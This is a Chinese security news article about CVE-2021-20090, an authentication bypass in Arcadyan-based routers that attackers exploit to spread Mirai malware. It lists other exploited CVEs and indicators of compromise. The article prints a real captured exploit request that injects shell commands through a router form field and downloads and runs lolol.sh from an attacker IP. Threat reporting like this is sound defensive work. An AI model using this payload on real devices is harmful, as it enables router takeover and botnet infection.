51CTO首页
AI.x社区
博客
学堂
精品班
软考社区
免费课
企业培训
鸿蒙开发者社区
WOT技术大会
IT证书
公众号矩阵
移动端
短视频免费课程课程排行直播课软考学堂
全部课程厂商认证IT技术24年11月软考PMP项目管理免费题库
在线学习
文章资源问答课堂专栏直播
51CTO
鸿蒙开发者社区
51CTO技术栈
51CTO官微
51CTO学堂
51CTO博客
CTO训练营
鸿蒙开发者社区订阅号
51CTO软考
51CTO学堂APP
51CTO学堂企业版APP
鸿蒙开发者社区视频号
51CTO软考题库
账号设置 退出

新漏洞正被在野利用,影响数百万路由器

作者:Avenger
安全 漏洞
CVE-2021-20090是一个由Tenable发现并在2021年8月3日公布的漏洞。现在,研究人员发现了其正在被在野利用。

[[416446]]

CVE-2021-20090是一个由Tenable发现并在2021年8月3日公布的漏洞。现在,研究人员发现了其正在被在野利用。

该漏洞是一个路径绕过漏洞,可导致认证绕过,攻击者可以利用其接管受影响设备的控制权。

根据 Tenable 的相关信息披露,CVE-2021-20090 漏洞被发现实际存在于 Arcadyan 固件中,这不仅影响了最初发现的 Buffalo 路由器,还影响了更多的设备。

影响范围如下所示:

在野利用

Juniper 威胁实验室近期也发现攻击者正在在野利用编号为 CVE-2021-20090 的身份验证绕过漏洞,攻击者通过其传播 Mirai 恶意软件。

  1. POST /images/..%2fapply_abstract.cgi HTTP/1.1   
  2. Connection: close   
  3. User-Agent: Dark   
  4. action=start_ping&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A 
  5. ARC_SYS_TelnetdEnable=1&%0AARC_SYS_=cd+/tmp; 
  6. wget+http://212.192.241.72/lolol.sh; 
  7. curl+-O+http://212.192.241.72/lolol.sh; 
  8. chmod+777+lolol.sh; 
  9. sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4  

不止 CVE-2021-20090,新发现的攻击团伙也频繁利用新漏洞扩充军火库:

  • CVE-2020-29557(DLink routers)
  • CVE-2021-1497(Cisco HyperFlex)
  • CVE-2021-1498(Cisco HyperFlex)
  • CVE-2021-31755(Tenda AC11)
  • CVE-2021-22502(MicroFocus OBR)
  • CVE-2021-22506(MicroFocus AM)
  • exploit-db 未分配 CVE 编号但存在 PoC 的 exploit

IOC

  1. 27.22.80.19  
  2. 212.192.241.72 
  3. 9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78 
  4. 73edf8bfbbeaccdd84204f24402dcf488c3533be2682724e5906396b9237411d 
  5. 8bb454cd942ce6680f083edf88ffa31661a47a45eb3681e1b36dd05043315399 
  6. f83eadaa00e81ad51e3ab479b900b981346895b99d045a6b6f77491c3132b-58c 
  7. e4bc34e321b31926fd2fa1696136187b13864dfa03fba6848e59f9f72bfa9529 
  8. 80331cf89f3e6026b33b8f1bfa1c304295b9327311661d7927f78824f04cf528 
  9. 904f9b2e029595365f4f4426069b274810510908c7dd23a3791a831f51e9f1fc 
  10. 283f932f30756408a59dac97a6965eb792915242214d590eab1c6cb049148582 
  11. c2f5bbf35afc7335f789e420c23c43a069ecfcca1a8f9fac5cd554a7a769440e 
  12. 70764ef9800c1d09f965fbb9698d0eda52448b23772d118f2f2c4ba37b59fc20 

 

责任编辑:赵宁宁 来源: FreeBuf
漏洞网络安全网络攻击
相关推荐
数百万便携式路由器受KCodes NetUSB 漏洞影响
SentinelOne研究员MaxVanAmerongen在KCodesNetUSB组件中发现了一个漏洞(CVE202145388),影响到数百万终端用户路由器。

2022-01-13 21:34:39

路由器漏洞网络攻击
九款WiFi路由器226个漏洞影响数百万设备
IoTInspector和CHIP的安全研究人员合作对Asus、AVM、DLink、Netgear、Edimax、TPLink、Synology和Linksys等生产的9款主流的WiFi路由器进行了安全性分析,在其中发现了226个安全漏洞。

2021-12-10 11:47:47

WiFi漏洞路由器
BrakTooth漏洞影响数百万蓝牙设备
最近研究人员发现了商业BT栈中的多个安全漏洞——BrakTooth,攻击者利用该漏洞可以发起DoS、任意代码执行等共计。

2021-09-05 05:59:00

BrakTooth漏洞蓝牙设备
HP OMEN驱动漏洞影响数百万HP设备
SentinelLabs安全研究人员在HPOMEN驱动中发现了一个高危漏洞,漏洞CVE编号为CVE20213437,CVSS评分为7.8分。

2021-09-17 11:03:25

HP OMEN漏洞攻击
DNS曝高危漏洞影响数百万物联网设备
近日,NozomiNetworks发出警告,uClibc库的域名系统(DNS)组件中存在一个高危漏洞,编号为CVE20220502,该漏洞将影响所有版本uClibcng库的域名系统(DNS)。资料显示,uClibc库专门为OpenWRT设计的一个分支,OpenWRT是用于各种关键基础设施部门的路由器的通用操作系统。

2022-05-05 14:01:02

DNS高危漏洞uClibc
Amnesia 33:33个 0 day漏洞影响数百万设备
Forescout安全研究人员在智能产品中使用的4个开源TCPIP栈(库)中发现了33个安全漏洞,影响超过150家厂商的数百万智能和工业产品和设备。

2020-12-11 05:51:58

漏洞网络攻击网络安全
微软警告,IE浏览零日漏洞正被在野利用
9月8日,微软安全团队警告,IE浏览器中的一个零日漏洞正被者积极利用,恶意的微软Office文档可以借用该漏洞对计算机发起攻击。

2021-09-09 15:40:46

零日漏洞IE浏览器微软
黑客利用Tatsu WordPress 插件漏洞,进行数百万次攻击
Wordfence是一家专门为WordPress插件提供安全解决方案的公司,一直在持续监测当前的攻击活动。据研究人员估计,有20000至50000个网站运行存在漏洞的TatsuBuilder版本。

2022-05-18 14:17:00

黑客漏洞网络攻击
27个SDK提权漏洞或将影响数百万云用户
在疫情的影响和远程办公趋势的影响下,EltimaSDK的使用频率也在不断增加,但近日,SentinelOne研究人员在EltimaSDK中发现了27个提权漏洞。

2021-12-09 18:59:53

提权漏洞漏洞攻击
数百万路由设备因KCodes NetUSB漏洞面临RCE攻击威胁
网络安全初创企业SentinelLabs的研究人员发现,KCodesNetUSB内核模块曝出了一个名为CVE202145388的高危远程代码执行(RCE)漏洞,多家厂商的数百万路由器设备使用该内核模块。

2022-01-12 12:33:15

漏洞网络安全网络攻击
勒索软件也有漏洞漏洞失去数百万赎金收入
网络安全研究人员发现了勒索软件中的漏洞,不用向网络犯罪团伙支付赎金就可以恢复遭加密的文件,打破重大勒索软件攻击行动攫取数百万美元赎金的期望。

2021-11-01 05:50:13

勒索软件漏洞赎金
Dell潜藏12年的驱动漏洞影响数百万计算机
CVE202121551漏洞实际上是5个漏洞的集合,是Dell计算机在BIOS更新过程中安装和加载的驱动DBUtil中的安全漏洞。

2021-05-08 10:07:29

驱动漏洞Dell计算机
ESET发出警告,联想三个漏洞影响数百万台电脑
值得庆幸的是,目前这些漏洞已经全部修复。为防止上述漏洞引发的攻击,Lenovo建议受影响设备的用户将系统固件版本更新到可用的最新版本。

2022-04-20 12:07:12

漏洞网络攻击网络安全
WordPress宕机几小时 数百万博客受影响
北京时间2月19日消息,据国外媒体报道,博客服务平台WordPress美国当地时间周四宕机几小时,使用该服务平台的9百万博客受到影响。

2010-02-20 17:51:05

英伟达高危漏洞威胁全球数百万AI应用
近日,英伟达容器工具包(NVIDIAContainerToolkit)曝出一个高危漏洞,威胁全球数百万AI系统和应用,包括所有通过该工具包访问GPU资源的大量云端和本地AI应用程序。

2024-09-30 13:31:57

戴尔曝出五大漏洞影响数百万 Inspiron、Vostro、XPS、Alienware 系统
五个高危漏洞的编号分别是CVE202224415、CVE202224416、CVE202224419、CVE202224420和CVE202224421,在CVSS评分系统中被评为8.2分(满分10分)。

2022-03-24 09:59:32

漏洞黑客网络攻击
Cox 存在 API 身份验证绕过漏洞影响数百万台调制解调
此次的Cox安全漏洞是由赏金猎人SamCurry发现的。他发现一旦威胁行为者成功利用该漏洞,就能够获取到与ISP技术支持类似的一组权限。

2024-06-04 14:22:53

SolarWinds 0day 漏洞正被积极利用
去年作为大规模供应链攻击事件中心的SolarWinds公司近期再被曝新0day漏洞,该漏洞可使攻击者在受感染系统上运行任意代码。

2021-07-14 17:17:45

0day漏洞恶意代码
DNS高危漏洞威胁全球数百万物联网设备
近日,Forescout研究实验室与JSOF合作,披露了一组新的DNS漏洞,称为NAME:WRECK。

2021-04-14 10:53:33

DNS漏洞物联网设备
惠普游戏本曝内核级漏洞影响全球数百万台计算机
HPOMEN驱动程序软件中存在一个严重漏洞,该漏洞影响全球数百万台游戏计算机。

2021-09-15 14:46:06

漏洞网络安全网络攻击
点赞
收藏

51CTO技术栈公众号

业务
速览
在线客服